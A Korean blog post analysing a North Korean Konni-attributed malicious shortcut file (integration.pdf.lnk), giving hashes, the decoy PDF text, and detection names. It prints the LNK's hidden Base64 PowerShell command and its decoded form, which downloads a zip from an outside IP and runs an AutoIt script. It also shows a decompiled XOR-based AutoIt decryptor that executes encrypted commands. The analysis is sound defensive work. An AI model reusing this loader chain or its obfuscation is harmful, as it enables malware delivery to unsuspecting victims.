꿈을꾸는 파랑새

오늘도 위대하게 경애하지 않는 북한 해킹 단체 Konni(코니) 에서 만든 악성코드인 integration.pdf.lnk(2024.8.22)에 대해 알아보겠습니다. 코니 는 2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 타깃 공격으로 하는 북한의 해킹 단체 Thallium, APT 37과 관련된 해킹 단체이며 Kimsuky(김수키)일 가능성도 있는 단체이며 당연히 북한의 정찰총국 밑에 있는 따가리 해킹 단체입니다.
악성코드 해쉬값
파일명:integration.pdf.lnk
사이즈:122 KB
MD5:ffde299028d48cb2258d274f44d56766
SHA-1:678fe2a8a01339138194a70763d69d18d2772beb
SHA-256:3a37c34e5b677b4388176fdcb41ce5c8971f6dc82116adc99309ca744c58ba66
이며 해당 악성코드 LNK 파일을 열어보면 다음과 같이 Base64로 돼 있는 것을 확인할 수가 있습니다.

악성코드 에 포함된 Base64 코드
악성코드 에 포함된 Base64 코드

StringD(a)ta
{
    namestring: PDF View
    relativepath: ..\..\Windows\System32\cmd(.)exe
    workingdir: C:\Users\User\Desktop
    commandlinearguments: /c powe(r)shell -WindowStyle Hidden -Command "
    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64
    String('JGFw(c)GR(h)dGEgP(S)BbU3lzdGVtLkVudmlyb25tZW50XTo6(R)2V0Rm9s
    ZGVyUGF0aCgnQXBwbGljYXRpb25EYXRhJyk7ICR(1)cmw(g)PSAn(a)HR0cDovLzIuN
    Tgu(N)TYuMTI0L0FQSTQ4MWYuemlwJzsgJHppcFBhdGggPSAiJGFwcGRhdGFcQVBJNDg
    xZi56(a)XAiOyBJbn(Z)va2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJH
    ppcFBhdGg7IEFkZC1UeXBlIC1B(c)3Nl(b)WJseU5hb(W)UgU3lzdGVtLklPLkNvbXByZ
    XNzaW9uLkZpbGVTeXN0ZW07IFtTeXN0ZW0uSU8uQ29tcHJl(c)3Npb24(u)WmlwR(m)lsZV
    06OkV4dHJhY3RUb0RpcmVjdG9yeSgkemlwUGF0aCw(g)JGFwcGRhdGEpOyAkYXV(0)b2l0U
    GF0aCA9ICIkY(X)BwZGF0(Y)VxBdXRvSXQzLmV4ZSI7ICRzY(3)JpcHRQYXRoID0gIiRhcH
    Bk(Y)XRhXHNjcmlwdC5(h)M3gi(O)yBTdGFydC1Qcm(9)jZXNzIC1GaWxlUGF0aCAkYXV0b
    2l0UGF0aCAtQXJndW1lbnRMaXN0ICRzY3J(p)cHRQYXRoOyBSZW1vdmUtSXRlbSAtUG(F)0
    aCAkemlwUGF0aA0K')) | Invoke-Expression"
    iconlocation: .\Document(.)pdf
}

이걸 다시 Base64 부분을 디코딩하면 다음과 같은 결과가 됩니다.

$appdata = [System.Environment]::GetFolderPath('ApplicationData'); $url = 
'hxxp://2(.)58(.)56(.)124/API481f(.)zip'; $zipPath = 
"$appdata\API481f(.)zip"; Invoke-WebRequest -Uri $url -
OutFile $zipPath; Add-Type -AssemblyName System(.)IO.Comp
ression.FileSystem; [System.IO(.)Compression.ZipFile]::Ext
ractToDirectory($zipPath, $appdata); $autoitPath = "$appdat
a\AutoIt3(.)exe"; $scriptPath = "$appdata\script(.)a3x"; Star
t-Process -FilePath $autoitPath -ArgumentList $scriptPath; 
Remove-Ite(m) -Path $zipPath

PDF 내용

Steps to using our system:
When you register you get a username and password. That will allow you to log in to the
website among other things.
When using the API please follow the link:
hxxps://api(.)publicleads(.)net/partners/v1/login?username={{$UserName}}&password={{$Passwor
d}}
If all goes OK you will get back a token that will be valid for 1 hour. Once you pass the one hour
you will need to sign again and get a new token.
that token will be needed to all API requests and will be part of them.
We are also matching IP and web browser agents so keep in mind you will be rejected if no
matching IP and user-agent are provided.
If you would like to get a single lead please use the following link:
hxxps://api(.)publicleads(.)net/partners/v1/search_lead?token={{token}}&email={{email}}
you will get back a JSON respond
in the respond you will get one lead matching the email.
To insert a lead to the DB please use the following link:
hxxps://api(.)publicleads(.)net/partners/v1/insert_lead with the following parameters
POST /partners/v1/add_lead
Headers:
Content-Type: application/json
Authorization: Bearer YOUR_API_TOKEN
Body:
{
"token": "YOUR_API_TOKEN",
"fname": "John",
"lname": "Doe",
"email": "john(.)doe@example(.)com",
"phone": "1234567890",
"brand": "BrandName",
"country": "CountryName"
} }

Public lead API PDF 내용
Public lead API PDF 내용

PDF 내용 번역

저희 시스템을 사용하기 위한 단계:
등록하면 사용자 이름과 비밀번호를 받게 됩니다. 이를 통해
웹사이트에 로그인할 수 있습니다.
API를 사용할 때는 다음 링크를 따라가세요:
hxxps://api(.)publicleads(.)net/partners/v1/login?username={{$UserName}}&password={{$Password
d}}
모든 것이 잘 진행되면 1시간 동안 유효한 토큰을 받게 됩니다. 1시간이 지나면
다시 서명하고 새 토큰을 받아야 합니다.
이 토큰은 모든 API 요청에 필요하며 그 일부가 됩니다.
또한 IP와 웹 브라우저 에이전트를 매칭하므로
일치하는 IP와 사용자 에이전트가 제공되지 않으면 거부된다는 점을 명심하세요.
단일 리드를 받으려면 다음 링크를 사용하세요.
hxxps://api(.)publicleads(.)net/partners/v1/search_lead?token={{token}}&email={{email}}
JSON 응답을 받게 됩니다.
응답에서 이메일과 일치하는 리드 하나를 받게 됩니다.
DB에 리드를 삽입하려면 다음 링크를 사용하세요.
hxxps://api(.)publicleads(.)net/partners/v1/insert_lead 다음 매개변수 사용
POST /partners/v1/add_lead
헤더:
Content-Type: application/json
Authorization: Bearer YOUR_API_TOKEN
본문:
{
"token": "YOUR_API_TOKEN",
"fname": "John",
"lname": "Doe",
"email": "john(.)doe@example(.)com",
"phone": "1234567890",
"brand": "BrandName",
"country": "CountryName"
} }

Public lead API PDF 내용 2
Public lead API PDF 내용 2

코드 분석

1.ApplicationData 디렉터리 경로를 가져오며 사용자별 응용 프로그램 데이터를 저장하는 데 사용됨2.$url = hxxp://2(.)58(.)56(.)124/API481f(.)zip
악성 코드 파일을 다운로드 할 주소
3.다운로드한 ZIP 파일을 저장할 경로를 지정 해당 경로는 사용자의 AppData 폴더 내에 저장
4. 지정된 URL에서 ZIP 파일을 다운로드하고 이를 $zipPath 경로에 저장
해당 단계에서 외부 서버로부터 파일을 가져오는 동작이 이루어짐
5.ZIP 파일을 압축 해제하기 위해 System(.)IO.Compression(.)FileSystem 로드
6.다운로드한 ZIP 파일의 내용을 압축 해제하여 AppData 폴더에 저장

CyberChef 로 Base 64 디코딩
CyberChef 로 Base 64 디코딩

7. 압축 해제된 파일 중에서 AutoIt3(.)exe의 경로를 지정
AutoIt3(.)exe 는 AutoIt 스크립트를 실행할 수 있는 실행 파일
8. 실행할 스크립트 파일인 script(.)a3x의 경로를 지정
9.AutoIt3(.)exe 프로그램을 실행하고 script(.)a3x 스크립트를 실행
10. 마지막으로 다운로드한 ZIP 파일을 삭제하여 흔적을 삭제
02A5A0 로 부터 컴파일된 오토잇 스크립트(a3x) 구조가 시작 3.26 버전 이상부터 EA06 매직 문자열이 사용
90C01에 종료 매직 문자열이 존재하는 것을 확인할 수가 있음
Autoit-Ripper 도구를 통해 디컴파일(Decompile)를 하면 됩니다.

script.a3x HEX 매직 넘버 시작
script.a3x HEX 매직 넘버 시작

해당 결과는 다음과 같은것을 확인을 할 수가 있었습니다.

GUICreate ( "ljh(a)dbq(x)i" , 6(3)9 , 103 )
; Func _(E)NCRYPT ( $VVALUE , $SK(E)Y )
	; GUICr(e)ate ( "hswf(z)brsv" , 6(7)1 , 487 )
	; $TBYTE = DllStructC(r)eate ( "B(Y)TE" )
	; GUICreate ( "m(o)njhpcyp" , 617 , 5(4)7 )
	; Local $S_ENCRY(P)TED
	; GUICreate ( "cqzq(a)vhts" , 212 , 929 )
	; Local $IKEYALT = Binar(y0Len ( $SKEY )
	; GUIC(r0)eate ( "lm(z)egpwoe" , 468 , 926 )
	; For $(I) = 1 To $IKEYALT
		; $I(K)EYALT = Bi(t)XOR ( BinaryM(i)d ( $SK(E)Y , $I , 1 ) , $(I)KEYALT )
	; Next
	; GU(I)Create ( "dbj(v)xrptj" , 557 , 222 )
	; For $I = 1 To Binar(y)Len ( $VVALUE )
		; $S_ENCRYPTED &= Ch(r) ( DllStructSe(t)Data ( $TBYTE , 1 , BitN(O)T
        ( BitXO(R) ( Bina(r)yMid ( $VVA(L)UE , $I , 1 ) , $IKEY(A)LT ) ) ) )
	; N(e)xt
	; GUICreate ( "tqhk(l)yank" , 248 , 422 )
	; Retu(r)n $S_ENCRYPTED
; EndF(u)nc
; #NoTra(y)Icon
; Local $D(A)TA
; $DATA = _EN(C)RYPT ( FileRead ( File(O)pen ( @ScriptFu(l)lPath , 16 ) , 173468 ) ,
"HgwQIdiT" )
; $PT = Execute ( _ENCRYPT ( BinaryToStri(n)g ( "0xAA8282BD(9)A9C9B
8D9AAD9C8B8F9A8BC6CC8(C)979A8BB5DFD9DDDAD8D6B3CCC7" ) , "HgwQIdiT" ) )
; Execute ( _ENCRYPT ( BinaryToString ( "0xAA8282AD8F8282C6CC858B9C8
0(8)B82D(D)DCC08A8282CCC2CCACA1A1A2CCC2CCB8879C9A(9)B8F82BE9C819A8B8D
9ACCC2(C)C9E9A9CCCC2AA8282BD9A9C9B8(D)9AA98B9ABE9A9CC6CA9E9AC7C2CC878
09ACCC2DFD9DDDAD(8)D6CEC2CC8A99819C8ACCC2DE96DADEC2CC8A99819C8AC4CCC2809B8282C7" ) ,
"HgwQIdiT" ) )
; Execute ( _ENCRY(P)T ( BinaryToStri(n)g ( "0xAA8282BD9A(9)C9B8D9ABD8B9AAA8F
9A8FC6CA9E9A(C)2DFC2CA8A8F9A8FC7" ) , "Hgw(Q)IdiT" ) )
; Execute ( _EN(C)RYPT ( BinaryToS(t)ring ( "0xAA8282AD(8)F8282C6CC9B9D8B9CDDDCC08A(
8)282CCC2CC87809ACCC2CCAB809B83(B)987808A81999DCCC2CC9E9A9CCCC2AA8282BD9(A)9C9B8D9AA
98B9ABE9A(9)CC6CA9E9AC7C2CC829E8F9(C)8F83CCC2DEC7" ) , "HgwQ(I)diT" ) )

코드 분석

1.GUICreate 함수 호출:GUICreate 함수는 일반적으로 AutoIt 스크립트에서 GUI를 생성하는 데 사용
코드 내에서 다섯 번 호출되며 각 호출에서 서로 다른 창의 이름과 크기가 설정
2.ENCRYPT 함수:
함수는 주어진 입력 데이터($VVALUE)를 지정된 키($SKEY)를 사용해 암호화
DllStructCreate 와 DllStructSetData 사용:해당 함수는 BYTE 타입의 Dll 구조체를 생성하고 각 바이트를 특정 비트 연산을 통해 변환
비트 연산 과정: 
BitXOR 연산:입력 값과 키 값을 XOR 연산
BitNOT 연산: XOR 연산 결과를 NOT 연산으로 반전
입력 데이터의 각 바이트에 반복
출력: 암호화된 결과가 문자열로 반환 해당 문자열은 이후의 Execute 함수에서 사용
3.Execute 함수 호출:
기능: 해당 함수는 문자열로 된 코드를 실행 해당 코드에서는 암호화된 문자열이 _ENCRYPT 함수에서 복호화되고 Execute 를 통해 실제로 실행
암호화된 명령어: 코드에서는 여러 번 Execute 함수가 사용되며 각각 암호화된 문자열을 복호화하고 바로 실행하는 구조
복호화 과정: 암호화된 명령어는 _ENCRYPT 함수에서 BinaryToString을 통해 문자열로 변환되고 다시 암호화 해제되어 실행 가능한 상태
암호화 및 복호화 과정

script.a3x HEX 매직 넘버 마지막
script.a3x HEX 매직 넘버 마지막

1.초기 키 설정:
$SKEY는 HgwQIdiT 로 설정되며 해당 키가 입력 데이터의 암호화 및 복호화에 사용
키의 길이는 BinaryLen 함수로 계산되며 이후 반복문에서 각 바이트와 XOR 연산을 수행
2.데이터 암호화:
For 루프를 사용해 입력 데이터의 각 바이트를 키와 XOR 한 뒤 NOT 연산을 수행하여 암호화된 데이터를 생성
해당 과정은 $VVALUE 의 모든 바이트에 대해 반복
3.명령어의 실행:
Execute 함수에서 암호화된 명령어가 _ENCRYPT 함수로 전달되어 복호화
2024-08-22 05:53:13 UTC 기준 바이러스토탈에서 탐지하는 보안 업체 목록들은 다음과 같습니다.

script.au3 디코딩 결과
script.au3 디코딩 결과

AliCloud:Trojan:Multi/Phonzy.B9nj
ALYac:Trojan.Agent.LNK.Gen
Arcabit:Heur.BZC.YAX.Boxter.331.756B3CE0 [many]
Avast:LNK:Agent-HV [Trj]
AVG:LNK:Agent-HV [Trj]
BitDefender:Heur.BZC.YAX.Boxter.331.756B3CE0
Emsisoft:Trojan.PowerShell.Gen (A)
eScan:Heur.BZC.YAX.Boxter.331.756B3CE0
ESET-NOD32:A Variant Of Generik.DGEEBYN
GData:Heur.BZC.YAX.Boxter.331.756B3CE0
Google:Detected
Huorong:TrojanDownloader/LNK.Netloader.r
Ikarus:Win32.Outbreak
Kaspersky:HEUR:Trojan.Multi.Powecod.a
Lionic:Trojan.WinLNK.Boxter.4!c
MAX:Malware (ai Score=82)
Microsoft:Trojan:Script/Phonzy.B!ml
Rising:Trojan.PSRunner/LNK!1.BADE (CLASSIC)
Sangfor Engine Zero:Trojan.Generic-LNK.Save.37dd00e8
SentinelOne (Static ML):Static AI - Suspicious LNK
Skyhigh (SWG):BehavesLike.Trojan.cx
Sophos:Troj/LnkObf-T
Symantec:Scr.Mallnk!gen1
Tencent:Unk.Win32.Script.403777
Trellix (ENS):Artemis!FFDE299028D4
Trellix (HX):Heur.BZC.YAX.Boxter.331.756B3CE0
TrendMicro:Trojan.LNK.REMCOS.YXEHVZ
TrendMicro-HouseCall:Trojan.LNK.REMCOS.YXEHVZ
VBA32:Trojan.Link.ShellCmd
VIPRE:Heur.BZC.YAX.Boxter.331.756B3CE0
ZoneAlarm by Check Point:HEUR:Trojan.Multi.Powecod.a
해당 악성코드 사이트 2024.8.22 20:48 기준으로 악성코드가 다운로드 가 되고 작동을 하고 있으니 주의하시길 바라면 AutoIt 활용을 해서 보안을 회피하기 위한 목적인 것 같고 메지로 가문의 정신으로 한 것이 아닌 박신 주의 정신으로 분석했기 때문에 오류가 있을 수가 있습니다.

728x90
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band